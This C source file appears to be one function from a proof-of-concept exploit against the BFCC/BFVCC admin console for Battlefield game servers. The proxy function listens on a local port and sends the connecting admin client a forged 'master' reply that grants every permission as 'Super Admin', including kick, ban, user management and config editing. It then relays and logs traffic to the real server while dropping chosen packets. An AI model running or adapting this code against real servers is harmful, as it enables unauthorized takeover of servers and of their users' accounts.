
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int u_char ;
struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {int sin_family; int sin_port; TYPE_1__ sin_addr; } ;
struct sockaddr {int dummy; } ;
typedef int peer ;
typedef int on ;
typedef int fd_set ;


 int AF_INET ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int INADDR_ANY ;
 int IPPROTO_TCP ;
 int MYPORT ;
 int SOCK_STREAM ;
 int SOL_SOCKET ;
 int SOMAXCONN ;
 int SO_REUSEADDR ;
 int accept (int,struct sockaddr*,int*) ;
 scalar_t__ bind (int,struct sockaddr*,int) ;
 scalar_t__ check_drop (int *) ;
 int close (int) ;
 int fwrite (int *,int,int,int ) ;
 int htons (int ) ;
 scalar_t__ listen (int,int ) ;
 int printf (char*,...) ;
 int recv_bfcc (int,int *,int) ;
 scalar_t__ select (int,int *,int *,int *,int *) ;
 int send (int,int *,int,int ) ;
 int send_bfcc (int,char*,char*,char*,char*,char*,char*,char*,int *) ;
 scalar_t__ setsockopt (int,int ,int ,char*,int) ;
 int socket (int ,int ,int ) ;
 int std_err () ;
 int stdout ;

void proxy(int sock, u_char *buff, int size) {
    struct sockaddr_in peer;
    fd_set readset;
    int sdl,
            sda,
            on = 1,
            len,
            psz,
            selsock;

    peer.sin_addr.s_addr = INADDR_ANY;
    peer.sin_port = htons(MYPORT);
    peer.sin_family = AF_INET;
    psz = sizeof(peer);

    printf("- bind port %hu\n", MYPORT);

    sdl = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sdl < 0) std_err();
    if(setsockopt(sdl, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sdl, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(listen(sdl, SOMAXCONN)
      < 0) std_err();

    printf("- launch BFC3 or BFVC3 and sets %s as server and %hu as port\n",
        "127.0.0.1", MYPORT);

    sda = accept(sdl, (struct sockaddr *)&peer, &psz);
    if(sda < 0) std_err();

    printf("- connected\n");

    send_bfcc(sda,
        "master",
        "null/null/null/0/Map_True/"
        "Action-Warn" "\xff" "1" "\xff"
        "Action-Kick" "\xff" "1" "\xff"
        "Action-Insta-Kick (No Reason)" "\xff" "1" "\xff"
        "Action-Ban" "\xff" "1" "\xff"
        "Action-Insta-Ban (No Reason)" "\xff" "1" "\xff"
        "Action-Remove Ban" "\xff" "1" "\xff"
        "Action-Clear Banlist" "\xff" "1" "\xff"
        "Action-Force to Other Team" "\xff" "1" "\xff"
        "Action-Kill Player" "\xff" "1" "\xff"
        "Action-Send Message to Server" "\xff" "1" "\xff"
        "Game-Pause" "\xff" "1" "\xff"
        "Game-Toggle Auto-Balance" "\xff" "1" "\xff"
        "Action-Request PB Screenshot" "\xff" "1" "\xff"
        "BFVC3-Maps Change Maps" "\xff" "1" "\xff"
        "BFVC3-Maps Change 2 Map NOT in " "\xff" "1" "\xff"
        "BFVC3-Maps Restart Map" "\xff" "1" "\xff"
        "BFVC3-Maps Set Next Map" "\xff" "1" "\xff"
        "BFVC3-Admin Change Server Settings" "\xff" "1" "\xff"
        "BFVC3-Admin Change FF Settings" "\xff" "1" "\xff"
        "BFVC3-Admin Change Misc Settings" "\xff" "1" "\xff"
        "BFVC3-Admin Change Voting Settings" "\xff" "1" "\xff"
        "USERS-Access User Accounts" "\xff" "1" "\xff"
        "USERS-Edit User Profiles" "\xff" "1" "\xff"
        "USERS-Create User" "\xff" "1" "\xff"
        "USERS-Edit User" "\xff" "1" "\xff"
        "USERS-Delete User" "\xff" "1" "\xff"
        "BFVCC-Access Manager Control Panel" "\xff" "1" "\xff"
        "BFVCC-Access to Auto Admin Settings" "\xff" "1" "\xff"
        "BFVCC-Load Manager Profiles" "\xff" "1" "\xff"
        "BFVCC-Save Changes to Profiles" "\xff" "1" "\xff"
        "BFVCC-Create Manager Profiles" "\xff" "1" "\xff"
        "BFVCC-Delete Manager Profiles" "\xff" "1" "\xff"
        "CC-Access the CC Editor" "\xff" "1" "\xff"
        "CC-Save Changes to CC Profiles" "\xff" "1" "\xff"
        "CC-Create new CC Profiles" "\xff" "1" "\xff"
        "CC-Delete CC Profile" "\xff" "1" "\xff"
        "CC-Change a Maps CC Profile" "\xff" "1" "\xff"
        "PB-Edit PB Config Files" "\xff" "1" "\xff",
        "15567",
        "admin" "\xff",
        "True",
        "Super Admin",
        "0",
        ((void*)0));

    selsock = ((sock > sda) ? sock : sda) + 1;

    for(;;) {
        FD_ZERO(&readset);
        FD_SET(sock, &readset);
        FD_SET(sda, &readset);
        if(select(selsock, &readset, ((void*)0), ((void*)0), ((void*)0))
          < 0) std_err();

        if(FD_ISSET(sda, &readset)) {
            len = recv_bfcc(sda, buff, size);
            fwrite(buff, len, 1, stdout);

            if(check_drop(buff)) continue;

            len = send(sock, buff, len, 0);
            if(len < 0) std_err();
        }

        if(FD_ISSET(sock, &readset)) {
            len = recv_bfcc(sock, buff, size);
            fwrite(buff, len, 1, stdout);

            if(check_drop(buff)) continue;

            len = send(sda, buff, len, 0);
            if(len < 0) std_err();
        }
    }

    close(sda);
    close(sdl);
}
